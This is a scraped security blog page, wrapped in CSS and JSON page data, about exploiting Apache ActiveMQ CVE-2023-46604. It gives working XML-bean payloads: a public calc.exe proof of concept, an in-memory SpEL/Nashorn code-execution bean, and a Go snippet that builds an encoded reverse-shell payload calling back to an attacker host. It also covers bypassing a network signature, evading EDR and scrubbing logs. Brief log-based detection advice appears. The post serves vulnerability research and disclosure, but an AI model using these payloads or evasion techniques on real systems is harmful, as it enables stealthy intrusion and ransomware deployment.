.ss--_{--shiki-light:#90A4AE;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sLACW, html code.shiki .sLACW{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: 
var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html pre.shiki code .sR7ES, html code.shiki .sR7ES{--shiki-light:#E2931D;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .sFhLe, html code.shiki 
.sFhLe{--shiki-light:#91B859;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}",{"title":219,"searchDepth":220,"depth":220,"links":84736},[84737,84738,84739,84740,84747],{"id":84089,"depth":220,"text":84090},{"id":84144,"depth":220,"text":84145},{"id":1902,"depth":220,"text":1903},{"id":84260,"depth":220,"text":84261,"children":84741},[84742,84743,84744,84745,84746],{"id":84276,"depth":1266,"text":84277},{"id":84365,"depth":1266,"text":84366},{"id":84487,"depth":1266,"text":84488},{"id":84504,"depth":1266,"text":84505},{"id":84613,"depth":1266,"text":84614},{"id":201,"depth":220,"text":202},"VulnCheck scans the Go module ecosystem for module repositories affected by repojacking, and discover hundreds of thousands of affected module-versions.",{"slug":84750},"go-repojacking","\u002Fblog\u002Fgo-repojacking",{"title":84035,"description":84748},"blog\u002Fgo-repojacking","6zz94HBaheDmeUqcfUmvf_qPvi24FAUc-bAZOn-FoeM",{"id":84756,"title":83349,"articles":84757,"authors":84779,"body":84781,"date":84761,"description":85781,"extension":234,"image":7,"link":7,"meta":85782,"navigation":237,"path":85784,"seo":85785,"series":7,"stem":85786,"subtype":7,"tags":85787,"__hash__":85788},"blog\u002Fblog\u002Fcve-2023-44604-activemq-in-memory.md",[84758,84762,84765,84769,84772,84776],{"title":84759,"source":39566,"link":84760,"date":84761},"Cyberespionage services sort themselves out during a time of hybrid war.","https:\u002F\u002Fthecyberwire.com\u002Fnewsletters\u002Fdaily-briefing\u002F12\u002F218","2023-11-15",{"title":84763,"source":14382,"link":84764,"date":84761},"New PoC Exploit for Apache ActiveMQ Flaw Could Let Attackers Fly Under the Radar","https:\u002F\u002Fthehackernews.com\u002F2023\u002F11\u002Fnew-poc-exploit-for-apache-activemq.html",{"title":84766,"source":11218,"link":84767,"date":84768},"Dangerous Apache ActiveMQ Exploit Allows Stealthy EDR 
Bypass","https:\u002F\u002Fwww.darkreading.com\u002Fapplication-security\u002Fdangerous-apache-activemq-exploit-edr-bypass","2023-11-16",{"title":84770,"source":11233,"link":84771,"date":84768},"Concealed attacks likely with new Apache Active MQ exploit","https:\u002F\u002Fwww.scmagazine.com\u002Fbrief\u002Fconcealed-attacks-likely-with-new-apache-active-mq-exploit",{"title":84773,"source":3494,"link":84774,"date":84775},"Risky Biz News: FCC adopts SIM-swapping and port-out protections","https:\u002F\u002Friskybiznews.substack.com\u002Fp\u002Ffcc-adopts-sim-swapping-port-out-protections?utm_source=post-email-title&publication_id=852612&post_id=138926737&utm_campaign=email-post-title&isFreemail=true&r=2rnh0k&utm_medium=email","2023-11-17",{"title":84777,"source":14378,"link":84778,"date":84775},"In Other News: Major Law Firm Hacked, Chinese Bank Pays Ransom, PyPI Security Audit","https:\u002F\u002Fwww.securityweek.com\u002Fin-other-news-major-law-firm-hacked-chinese-bank-pays-ransom-pypi-security-audit\u002F",[84780],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":84782,"toc":85773},[84783,84786,84788,84828,84832,84859,85100,85151,85161,85164,85168,85179,85185,85198,85204,85372,85393,85396,85407,85423,85426,85430,85438,85570,85584,85587,85742,85744,85753,85755,85770],[263,84784],{":list":84785,"ico":266,"title":83349},"[\"CVE-2023-46604 allows attackers to execute arbitrary code from ActiveMQ’s memory, therefore avoiding most detections.\",\"There were no public details or detections for this exploitation method until this blog.\",\"A memory-resident attacker is very difficult to detect. 
It’s best to ensure your ActiveMQ instances are not internet-facing.\"]",[61,84787,11648],{"id":11647},[18,84789,84790,1246,84795,1255,84799,84804,84805,10515,84810,84814,84815,84817,84818,1554,84821,84824,84825,59],{},[47,84791,84794],{"href":84792,"rel":84793},"https:\u002F\u002Fwww.huntress.com\u002Fblog\u002Fcritical-vulnerability-exploitation-of-apache-activemq-cve-2023-46604",[51],"Huntress Labs",[47,84796,33465],{"href":84797,"rel":84798},"https:\u002F\u002Fwww.rapid7.com\u002Fblog\u002Fpost\u002F2023\u002F11\u002F01\u002Fetr-suspected-exploitation-of-apache-activemq-cve-2023-46604\u002F",[51],[47,84800,84803],{"href":84801,"rel":84802},"https:\u002F\u002Farcticwolf.com\u002Fresources\u002Fblog\u002Ftellmethetruth-exploitation-of-cve-2023-46604-leading-to-ransomware\u002F",[51],"Arctic Wolf"," all recently published reports of threat actors exploiting ",[47,84806,84809],{"href":84807,"rel":84808},"https:\u002F\u002Factivemq.apache.org\u002F",[51],"ActiveMQ",[47,84811,10429],{"href":84812,"rel":84813},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2023-46604",[51]," to drop ransomware onto the victim host. The attackers used CVE-2023-46604 to invoke ",[886,84816,14509],{}," followed by ",[886,84819,84820],{},"curl.exe",[886,84822,84823],{},"msiexec.exe"," in order to download and execute their ransomware. The attackers were very noisy and caught the aforementioned companies' attention, all of which offer managed detection and response products. However, the attacks needn’t have been so noisy. In this blog, we will explore how an attacker can exploit CVE-2023-46604 and execute arbitrary code ",[1131,84826,84827],{},"from memory",[61,84829,84831],{"id":84830},"public-exploits","Public Exploits",[18,84833,84834,84835,84840,84841,84846,84847,84852,84853,84858],{},"The threat actors all appeared to have relied on the public details for this vulnerability. 
The exploit was originally disclosed in a Chinese-language blog by ",[47,84836,84839],{"href":84837,"rel":84838},"https:\u002F\u002Fexp10it.cn\u002F2023\u002F10\u002Fapache-activemq-%E7%89%88%E6%9C%AC-5.18.3-rce-%E5%88%86%E6%9E%90\u002F",[51],"X1R0z"," on October 25, 2023 and then re-analyzed by ",[47,84842,84845],{"href":84843,"rel":84844},"https:\u002F\u002Fattackerkb.com\u002Ftopics\u002FIHsgZDE3tS\u002Fcve-2023-46604\u002Frapid7-analysis",[51],"Stephen Fewer"," of Rapid7 on November 1, 2023. They both, more or less, came up with an exploit that used ",[47,84848,84851],{"href":84849,"rel":84850},"https:\u002F\u002Fdocs.spring.io\u002Fspring-framework\u002Fdocs\u002Fcurrent\u002Fjavadoc-api\u002Forg\u002Fspringframework\u002Fcontext\u002Fsupport\u002FClassPathXmlApplicationContext.html",[51],"ClassPathXmlApplicationContext"," to load an ",[47,84854,84857],{"href":84855,"rel":84856},"https:\u002F\u002Fdocs.spring.io\u002Fspring-framework\u002Fdocs\u002F4.2.x\u002Fspring-framework-reference\u002Fhtml\u002Fxsd-configuration.html",[51],"XML Bean"," that looks like this:",[1354,84860,84862],{"className":56326,"code":84861,"language":56328,"meta":219,"style":219},"\u003C?xml version=\"1.0\" encoding=\"UTF-8\" ?>\n    \u003Cbeans xmlns=\"http:\u002F\u002Fwww.springframework.org\u002Fschema\u002Fbeans\"\n       xmlns:xsi=\"http:\u002F\u002Fwww.w3.org\u002F2001\u002FXMLSchema-instance\"\n       xsi:schemaLocation=\"\n     http:\u002F\u002Fwww.springframework.org\u002Fschema\u002Fbeans http:\u002F\u002Fwww.springframework.org\u002Fschema\u002Fbeans\u002Fspring-beans.xsd\">\n        \u003Cbean id=\"pb\" class=\"java.lang.ProcessBuilder\" init-method=\"start\">\n            \u003Cconstructor-arg >\n            \u003Clist>\n                \u003Cvalue>cmd.exe\u003C\u002Fvalue>\n                \u003Cvalue>\u002Fc\u003C\u002Fvalue>\n                \u003Cvalue>calc.exe\u003C\u002Fvalue>\n            \u003C\u002Flist>\n            \u003C\u002Fconstructor-arg>\n        
\u003C\u002Fbean>\n    \u003C\u002Fbeans>\n",[886,84863,84864,84894,84912,84931,84945,84954,84997,85007,85015,85032,85049,85066,85075,85083,85092],{"__ignoreMap":219},[1373,84865,84866,84868,84870,84872,84874,84876,84879,84881,84884,84886,84888,84890,84892],{"class":1375,"line":1376},[1373,84867,2323],{"class":1383},[1373,84869,56328],{"class":6300},[1373,84871,45880],{"class":8252},[1373,84873,5417],{"class":1383},[1373,84875,183],{"class":1387},[1373,84877,84878],{"class":1391},"1.0",[1373,84880,183],{"class":1387},[1373,84882,84883],{"class":8252}," encoding",[1373,84885,5417],{"class":1383},[1373,84887,183],{"class":1387},[1373,84889,27674],{"class":1391},[1373,84891,183],{"class":1387},[1373,84893,2347],{"class":1383},[1373,84895,84896,84898,84901,84903,84905,84907,84910],{"class":1375,"line":220},[1373,84897,8246],{"class":1383},[1373,84899,84900],{"class":6300},"beans",[1373,84902,51807],{"class":8252},[1373,84904,5417],{"class":1383},[1373,84906,183],{"class":1387},[1373,84908,84909],{"class":1391},"http:\u002F\u002Fwww.springframework.org\u002Fschema\u002Fbeans",[1373,84911,19057],{"class":1387},[1373,84913,84914,84917,84919,84922,84924,84926,84929],{"class":1375,"line":1266},[1373,84915,84916],{"class":8252},"       xmlns",[1373,84918,4606],{"class":51986},[1373,84920,84921],{"class":8252},"xsi",[1373,84923,5417],{"class":1383},[1373,84925,183],{"class":1387},[1373,84927,84928],{"class":1391},"http:\u002F\u002Fwww.w3.org\u002F2001\u002FXMLSchema-instance",[1373,84930,19057],{"class":1387},[1373,84932,84933,84936,84938,84941,84943],{"class":1375,"line":1852},[1373,84934,84935],{"class":8252},"       xsi",[1373,84937,4606],{"class":51986},[1373,84939,84940],{"class":8252},"schemaLocation",[1373,84942,5417],{"class":1383},[1373,84944,19057],{"class":1387},[1373,84946,84947,84950,84952],{"class":1375,"line":4692},[1373,84948,84949],{"class":1391},"     http:\u002F\u002Fwww.springframework.org\u002Fschema\u002Fbeans 
http:\u002F\u002Fwww.springframework.org\u002Fschema\u002Fbeans\u002Fspring-beans.xsd",[1373,84951,183],{"class":1387},[1373,84953,6765],{"class":1383},[1373,84955,84956,84958,84961,84963,84965,84967,84970,84972,84974,84976,84978,84981,84983,84986,84988,84990,84993,84995],{"class":1375,"line":4724},[1373,84957,46606],{"class":1383},[1373,84959,84960],{"class":6300},"bean",[1373,84962,7911],{"class":8252},[1373,84964,5417],{"class":1383},[1373,84966,183],{"class":1387},[1373,84968,84969],{"class":1391},"pb",[1373,84971,183],{"class":1387},[1373,84973,27205],{"class":8252},[1373,84975,5417],{"class":1383},[1373,84977,183],{"class":1387},[1373,84979,84980],{"class":1391},"java.lang.ProcessBuilder",[1373,84982,183],{"class":1387},[1373,84984,84985],{"class":8252}," init-method",[1373,84987,5417],{"class":1383},[1373,84989,183],{"class":1387},[1373,84991,84992],{"class":1391},"start",[1373,84994,183],{"class":1387},[1373,84996,6765],{"class":1383},[1373,84998,84999,85001,85004],{"class":1375,"line":4756},[1373,85000,46655],{"class":1383},[1373,85002,85003],{"class":6300},"constructor-arg",[1373,85005,85006],{"class":1383}," 
>\n",[1373,85008,85009,85011,85013],{"class":1375,"line":4768},[1373,85010,46655],{"class":1383},[1373,85012,49165],{"class":6300},[1373,85014,6765],{"class":1383},[1373,85016,85017,85019,85022,85024,85026,85028,85030],{"class":1375,"line":4792},[1373,85018,46674],{"class":1383},[1373,85020,85021],{"class":6300},"value",[1373,85023,5384],{"class":1383},[1373,85025,14509],{"class":4640},[1373,85027,46627],{"class":1383},[1373,85029,85021],{"class":6300},[1373,85031,6765],{"class":1383},[1373,85033,85034,85036,85038,85040,85043,85045,85047],{"class":1375,"line":4798},[1373,85035,46674],{"class":1383},[1373,85037,85021],{"class":6300},[1373,85039,5384],{"class":1383},[1373,85041,85042],{"class":4640},"\u002Fc",[1373,85044,46627],{"class":1383},[1373,85046,85021],{"class":6300},[1373,85048,6765],{"class":1383},[1373,85050,85051,85053,85055,85057,85060,85062,85064],{"class":1375,"line":4806},[1373,85052,46674],{"class":1383},[1373,85054,85021],{"class":6300},[1373,85056,5384],{"class":1383},[1373,85058,85059],{"class":4640},"calc.exe",[1373,85061,46627],{"class":1383},[1373,85063,85021],{"class":6300},[1373,85065,6765],{"class":1383},[1373,85067,85068,85071,85073],{"class":1375,"line":4817},[1373,85069,85070],{"class":1383},"            \u003C\u002F",[1373,85072,49165],{"class":6300},[1373,85074,6765],{"class":1383},[1373,85076,85077,85079,85081],{"class":1375,"line":4825},[1373,85078,85070],{"class":1383},[1373,85080,85003],{"class":6300},[1373,85082,6765],{"class":1383},[1373,85084,85085,85088,85090],{"class":1375,"line":4835},[1373,85086,85087],{"class":1383},"        \u003C\u002F",[1373,85089,84960],{"class":6300},[1373,85091,6765],{"class":1383},[1373,85093,85094,85096,85098],{"class":1375,"line":4843},[1373,85095,56557],{"class":1383},[1373,85097,84900],{"class":6300},[1373,85099,6765],{"class":1383},[18,85101,85102,85103,85106,85107,1246,85111,1246,85115,1246,85120,1246,85125,1246,85130,1246,85135,1246,85140,1246,85145,85150],{},"The above XML bean causes 
ActiveMQ to call ",[886,85104,85105],{},"new java.lang.ProcessBuilder(“cmd.exe”, “\u002Fc”, “calc.exe”).start();",", which results in ActiveMQ launching the calculator process. There have been quite a few other public exploits (",[47,85108,36852],{"href":85109,"rel":85110},"https:\u002F\u002Fgithub.com\u002Frapid7\u002Fmetasploit-framework\u002Fpull\u002F18501\u002Ffiles",[51],[47,85112,22175],{"href":85113,"rel":85114},"https:\u002F\u002Fraw.githubusercontent.com\u002Fprojectdiscovery\u002Fnuclei-templates\u002Fmain\u002Fnetwork\u002Fcves\u002F2023\u002FCVE-2023-46604.yaml",[51],[47,85116,85119],{"href":85117,"rel":85118},"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002F90299d8578e8",[51],"XDB-90299d8578e8",[47,85121,85124],{"href":85122,"rel":85123},"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002F07dca85f6442",[51],"XDB-07dca85f6442",[47,85126,85129],{"href":85127,"rel":85128},"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002F2a263bac5fa9",[51],"XDB-2a263bac5fa9",[47,85131,85134],{"href":85132,"rel":85133},"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002Fc01880ea274b",[51],"XDB-c01880ea274b",[47,85136,85139],{"href":85137,"rel":85138},"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002F5f38a93c3fe0",[51],"XDB-5f38a93c3fe0",[47,85141,85144],{"href":85142,"rel":85143},"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002F0462e934919b",[51],"XDB-0462e934919b",[47,85146,85149],{"href":85147,"rel":85148},"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002F7adf2c60412f",[51],"XDB-7adf2c60412f",") but none deviate from this path.",[18,85152,85153,85154,85157,85158,27987],{},"The perceived restriction is that the attacker must use a bean that accepts all of its configuration through its constructor and has a function that can be invoked via the ",[886,85155,85156],{},"init-method"," parameter (or ",[886,85159,85160],{},"destroy",[18,85162,85163],{},"However, none of those restrictions actually exist.",[61,85165,85167],{"id":85166},"creating-a-better-exploit","Creating a Better 
Exploit",[18,85169,85170,85171,14193,85173,85178],{},"The first detail worth noting is that the attacker doesn’t have to use ",[886,85172,84851],{},[47,85174,85177],{"href":85175,"rel":85176},"https:\u002F\u002Fdocs.spring.io\u002Fspring-framework\u002Fdocs\u002Fcurrent\u002Fjavadoc-api\u002Forg\u002Fspringframework\u002Fcontext\u002Fsupport\u002FFileSystemXmlApplicationContext.html",[51],"FileSystemXmlApplicationContext"," works just fine. The output barely changes on the wire.",[18,85180,85181],{},[68,85182],{":width":10862,"alt":85183,"src":85184},"CVE-2023-46604 on the wire","\u002Fblog\u002Fcve-2023-44604-activemq-in-memory\u002Fcve-2023-44604-otw.png",[18,85186,85187,85188,85192,85193,85195,85196,59],{},"It’s important to note because existing network signatures (see ",[47,85189,85191],{"href":39489,"rel":85190},[51],"sid:2049045",") rely on ",[886,85194,84851],{}," being present. So we get a simple signature bypass by using ",[886,85197,85177],{},[18,85199,85200,85201,85203],{},"When it comes to the XML bean, we don’t actually need most of what the public exploits use. We don’t need to construct a bean or invoke a function via ",[886,85202,85156],{},". 
We just need to use SpEL.",[1354,85205,85207],{"className":56326,"code":85206,"language":56328,"meta":219,"style":219},"\u003Cbeans xmlns=\"http:\u002F\u002Fwww.springframework.org\u002Fschema\u002Fbeans\" xmlns:xsi=\"http:\u002F\u002Fwww.w3.org\u002F2001\u002FXMLSchema-instance\" xsi:schemaLocation=\"http:\u002F\u002Fwww.springframework.org\u002Fschema\u002Fbeans http:\u002F\u002Fwww.springframework.org\u002Fschema\u002Fbeans\u002Fspring-beans.xsd\">\n    \u003Cbean id=\"vulncheck\" class=\"java.lang.String\">\n     \u003Cproperty name=\"vc\" value=\"#{''.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('Nashorn').eval('var fw = new java.io.FileWriter(&quot;\u002Ftmp\u002F3&quot;); fw.write(&quot;Hello VulnCheck&quot;); fw.close();')}\"\u002F>\n    \u003C\u002Fbean>\n\u003C\u002Fbeans>\n",[886,85208,85209,85257,85286,85356,85364],{"__ignoreMap":219},[1373,85210,85211,85213,85215,85217,85219,85221,85223,85225,85227,85229,85231,85233,85235,85237,85239,85242,85244,85246,85248,85250,85253,85255],{"class":1375,"line":1376},[1373,85212,11852],{"class":1383},[1373,85214,84900],{"class":6300},[1373,85216,51807],{"class":8252},[1373,85218,5417],{"class":1383},[1373,85220,183],{"class":1387},[1373,85222,84909],{"class":1391},[1373,85224,183],{"class":1387},[1373,85226,51807],{"class":8252},[1373,85228,4606],{"class":51986},[1373,85230,84921],{"class":8252},[1373,85232,5417],{"class":1383},[1373,85234,183],{"class":1387},[1373,85236,84928],{"class":1391},[1373,85238,183],{"class":1387},[1373,85240,85241],{"class":8252}," xsi",[1373,85243,4606],{"class":51986},[1373,85245,84940],{"class":8252},[1373,85247,5417],{"class":1383},[1373,85249,183],{"class":1387},[1373,85251,85252],{"class":1391},"http:\u002F\u002Fwww.springframework.org\u002Fschema\u002Fbeans 
http:\u002F\u002Fwww.springframework.org\u002Fschema\u002Fbeans\u002Fspring-beans.xsd",[1373,85254,183],{"class":1387},[1373,85256,6765],{"class":1383},[1373,85258,85259,85261,85263,85265,85267,85269,85271,85273,85275,85277,85279,85282,85284],{"class":1375,"line":220},[1373,85260,8246],{"class":1383},[1373,85262,84960],{"class":6300},[1373,85264,7911],{"class":8252},[1373,85266,5417],{"class":1383},[1373,85268,183],{"class":1387},[1373,85270,19383],{"class":1391},[1373,85272,183],{"class":1387},[1373,85274,27205],{"class":8252},[1373,85276,5417],{"class":1383},[1373,85278,183],{"class":1387},[1373,85280,85281],{"class":1391},"java.lang.String",[1373,85283,183],{"class":1387},[1373,85285,6765],{"class":1383},[1373,85287,85288,85291,85294,85296,85298,85300,85303,85305,85307,85309,85311,85314,85316,85319,85321,85324,85326,85328,85330,85333,85335,85337,85339,85342,85344,85346,85348,85351,85353],{"class":1375,"line":1266},[1373,85289,85290],{"class":1383},"     \u003C",[1373,85292,85293],{"class":6300},"property",[1373,85295,46496],{"class":8252},[1373,85297,5417],{"class":1383},[1373,85299,183],{"class":1387},[1373,85301,85302],{"class":1391},"vc",[1373,85304,183],{"class":1387},[1373,85306,49451],{"class":8252},[1373,85308,5417],{"class":1383},[1373,85310,183],{"class":1387},[1373,85312,85313],{"class":1391},"#{''.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('Nashorn').eval('var fw = new java.io.FileWriter(",[1373,85315,7218],{"class":7054},[1373,85317,85318],{"class":2209},"quot",[1373,85320,39663],{"class":7054},[1373,85322,85323],{"class":1391},"\u002Ftmp\u002F3",[1373,85325,7218],{"class":7054},[1373,85327,85318],{"class":2209},[1373,85329,39663],{"class":7054},[1373,85331,85332],{"class":1391},"); fw.write(",[1373,85334,7218],{"class":7054},[1373,85336,85318],{"class":2209},[1373,85338,39663],{"class":7054},[1373,85340,85341],{"class":1391},"Hello 
VulnCheck",[1373,85343,7218],{"class":7054},[1373,85345,85318],{"class":2209},[1373,85347,39663],{"class":7054},[1373,85349,85350],{"class":1391},"); fw.close();')}",[1373,85352,183],{"class":1387},[1373,85354,85355],{"class":1383},"\u002F>\n",[1373,85357,85358,85360,85362],{"class":1375,"line":1852},[1373,85359,56557],{"class":1383},[1373,85361,84960],{"class":6300},[1373,85363,6765],{"class":1383},[1373,85365,85366,85368,85370],{"class":1375,"line":4692},[1373,85367,46627],{"class":1383},[1373,85369,84900],{"class":6300},[1373,85371,6765],{"class":1383},[18,85373,85374,85375,1554,85377,85379,85380,85382,85383,85388,85389,85392],{},"In the XML bean above, you can see that we’ve embedded a SpEL expression to invoke the Nashorn javascript engine and write a file to disk. The payload does not shell out to ",[886,85376,14509],{},[886,85378,2197],{}," to write to disk. It just uses the native functionality in the ",[886,85381,82664],{}," process. Spring, ",[47,85384,85387],{"href":85385,"rel":85386},"https:\u002F\u002Fdocs.spring.io\u002Fspring-framework\u002Freference\u002Fcore\u002Fexpressions\u002Fbeandef.html",[51],"by design",", allows for SpEL in bean definitions. As a feature, we can execute arbitrary code ",[1131,85390,85391],{},"as the original process",". We don’t need to shell out to a new process at all!",[18,85394,85395],{},"That means the threat actors could have avoided dropping their tools to disk. They could have just written their encryptor in Nashorn (or loaded a class\u002FJAR into memory) and remained memory resident. 
Perhaps avoiding detection from the aforementioned managed EDR teams.",[18,85397,85398,85399,85402,85403,85406],{},"However, if the attacker ",[1131,85400,85401],{},"did"," do that, they’d also need to clean up the ",[886,85404,85405],{},"activemq.log"," because the above XML triggers the following log message (note that:",[1925,85408,85409],{},[18,85410,85411,85412,85418,85419,85422],{},"2023-11-11 140510,839 | WARN | Exception encountered during context initialization - canceling refresh attempt: org.springframework.beans.factory.BeanCreationException: Error creating bean with name 'vulncheck' defined in URL ",[1373,85413,85414],{},[47,85415,85416],{"href":85416,"rel":85417},"http:\u002F\u002F10.9.49.131:8080\u002FbppkArhoWrRn",[51]," : Initialization of bean failed; nested exception is org.springframework.beans.factory.BeanExpressionException: Expression parsing failed; nested exception is org.springframework.expression.ExpressionInvocationTargetException: A problem occurred when trying to execute method 'eval' on object of type ",[1373,85420,85421],{},"jdk.nashorn.api.scripting.NashornScriptEngine"," | org.springframework.context.support.FileSystemXmlApplicationContext | ActiveMQ Transport: tcp:\u002F\u002F\u002F10.9.49.131:57484@61616",[18,85424,85425],{},"Generally speaking, you never want to see Nashorn in your logs. You really don’t want to see it associated with BeanCreation. Note that the nested exception will not always include a “Nashorn` exception, so detection should occur around the remote BeanCreationException.",[61,85427,85429],{"id":85428},"a-reverse-shell","A Reverse Shell",[18,85431,85432,85433,1554,85435,85437],{},"The overarching objective of this blog was executing arbitrary code in memory. However, I’m informed people would be disappointed if they didn’t get a reverse shell payload. Remember, when you use this reverse shell, you are using ",[886,85434,2197],{},[886,85436,14509],{},"... 
which is the exact thing that caught Huntress, Rapid7, and ArticFox’s attention in the first place. But here you go anyway:",[1354,85439,85441],{"className":19022,"code":85440,"language":19024,"meta":219,"style":219},"xml := fmt.Sprintf(`\u003Cbeans\n       xmlns=\"http:\u002F\u002Fwww.springframework.org\u002Fschema\u002Fbeans\"\n       xmlns:xsi=\"http:\u002F\u002Fwww.w3.org\u002F2001\u002FXMLSchema-instance\"\n           xsi:schemaLocation=\"\n           http:\u002F\u002Fwww.springframework.org\u002Fschema\u002Fbeans http:\u002F\u002Fwww.springframework.org\u002Fschema\u002Fbeans\u002Fspring-beans.xsd\">\n       \u003Cbean id=\"vulncheck\" class=\"java.lang.String\">\n           \u003Cproperty name=\"file\" value=\"#{''.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('Nashorn').eval('eval(new java.lang.String(java.util.Base64.decoder.decode(&quot;%s&quot;)));')}\"\u002F>\n       \u003C\u002Fbean>\n   \u003C\u002Fbeans>`, b64.StdEncoding.EncodeToString([]byte(payload.ReverseShellJJSScript(conf.Lhost, conf.Lport, conf.C2Type == c2.SSLShellServer))))\n\n",[886,85442,85443,85463,85468,85473,85478,85483,85488,85498,85503],{"__ignoreMap":219},[1373,85444,85445,85448,85450,85452,85454,85456,85458,85460],{"class":1375,"line":1376},[1373,85446,85447],{"class":4640},"xml ",[1373,85449,20584],{"class":1397},[1373,85451,82848],{"class":4640},[1373,85453,59],{"class":1383},[1373,85455,82853],{"class":7297},[1373,85457,1384],{"class":1383},[1373,85459,19169],{"class":1387},[1373,85461,85462],{"class":1391},"\u003Cbeans\n",[1373,85464,85465],{"class":1375,"line":220},[1373,85466,85467],{"class":1391},"       xmlns=\"http:\u002F\u002Fwww.springframework.org\u002Fschema\u002Fbeans\"\n",[1373,85469,85470],{"class":1375,"line":1266},[1373,85471,85472],{"class":1391},"       xmlns:xsi=\"http:\u002F\u002Fwww.w3.org\u002F2001\u002FXMLSchema-instance\"\n",[1373,85474,85475],{"class":1375,"line":1852},[1373,85476,85477],{"class":1391},"           
xsi:schemaLocation=\"\n",[1373,85479,85480],{"class":1375,"line":4692},[1373,85481,85482],{"class":1391},"           http:\u002F\u002Fwww.springframework.org\u002Fschema\u002Fbeans http:\u002F\u002Fwww.springframework.org\u002Fschema\u002Fbeans\u002Fspring-beans.xsd\">\n",[1373,85484,85485],{"class":1375,"line":4724},[1373,85486,85487],{"class":1391},"       \u003Cbean id=\"vulncheck\" class=\"java.lang.String\">\n",[1373,85489,85490,85493,85495],{"class":1375,"line":4756},[1373,85491,85492],{"class":1391},"           \u003Cproperty name=\"file\" value=\"#{''.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('Nashorn').eval('eval(new java.lang.String(java.util.Base64.decoder.decode(&quot;",[1373,85494,38048],{"class":37971},[1373,85496,85497],{"class":1391},"&quot;)));')}\"\u002F>\n",[1373,85499,85500],{"class":1375,"line":4768},[1373,85501,85502],{"class":1391},"       \u003C\u002Fbean>\n",[1373,85504,85505,85508,85510,85512,85514,85516,85518,85520,85522,85524,85526,85528,85530,85532,85534,85536,85538,85540,85542,85544,85546,85548,85550,85552,85554,85556,85558,85560,85562,85564,85567],{"class":1375,"line":4792},[1373,85506,85507],{"class":1391},"   
\u003C\u002Fbeans>",[1373,85509,19169],{"class":1387},[1373,85511,5437],{"class":1383},[1373,85513,82963],{"class":4640},[1373,85515,59],{"class":1383},[1373,85517,82968],{"class":4640},[1373,85519,59],{"class":1383},[1373,85521,82973],{"class":7297},[1373,85523,82976],{"class":1383},[1373,85525,82979],{"class":7293},[1373,85527,1384],{"class":1383},[1373,85529,11736],{"class":4640},[1373,85531,59],{"class":1383},[1373,85533,82905],{"class":7297},[1373,85535,1384],{"class":1383},[1373,85537,38107],{"class":4640},[1373,85539,59],{"class":1383},[1373,85541,38239],{"class":4640},[1373,85543,5437],{"class":1383},[1373,85545,20633],{"class":4640},[1373,85547,59],{"class":1383},[1373,85549,38248],{"class":4640},[1373,85551,5437],{"class":1383},[1373,85553,20633],{"class":4640},[1373,85555,59],{"class":1383},[1373,85557,38189],{"class":4640},[1373,85559,15920],{"class":1397},[1373,85561,38199],{"class":4640},[1373,85563,59],{"class":1383},[1373,85565,85566],{"class":4640},"SSLShellServer",[1373,85568,85569],{"class":1383},"))))\n",[18,85571,85572,85573,85578,85579,85583],{},"Note that ",[47,85574,85577],{"href":85575,"rel":85576},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fgo-exploit\u002Fblob\u002F62833721dab65674281d5a82abe37816d742f358\u002Fpayload\u002Freverse.go#L81",[51],"payload.ReverseShellJSSScript"," is from ",[47,85580,20558],{"href":85581,"rel":85582},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fgo-exploit\u002Ftree\u002Fmain",[51],", and automatically supports Windows and Linux targets, as well as encryption.",[18,85585,85586],{},"The whole thing looks like this on the wire:",[1354,85588,85590],{"className":56326,"code":85589,"language":56328,"meta":219,"style":219},"\u003Cbeans\n    xmlns=\"http:\u002F\u002Fwww.springframework.org\u002Fschema\u002Fbeans\"\n    xmlns:xsi=\"http:\u002F\u002Fwww.w3.org\u002F2001\u002FXMLSchema-instance\"\n         xsi:schemaLocation=\"\n         http:\u002F\u002Fwww.springframework.org\u002Fschema\u002Fbeans 
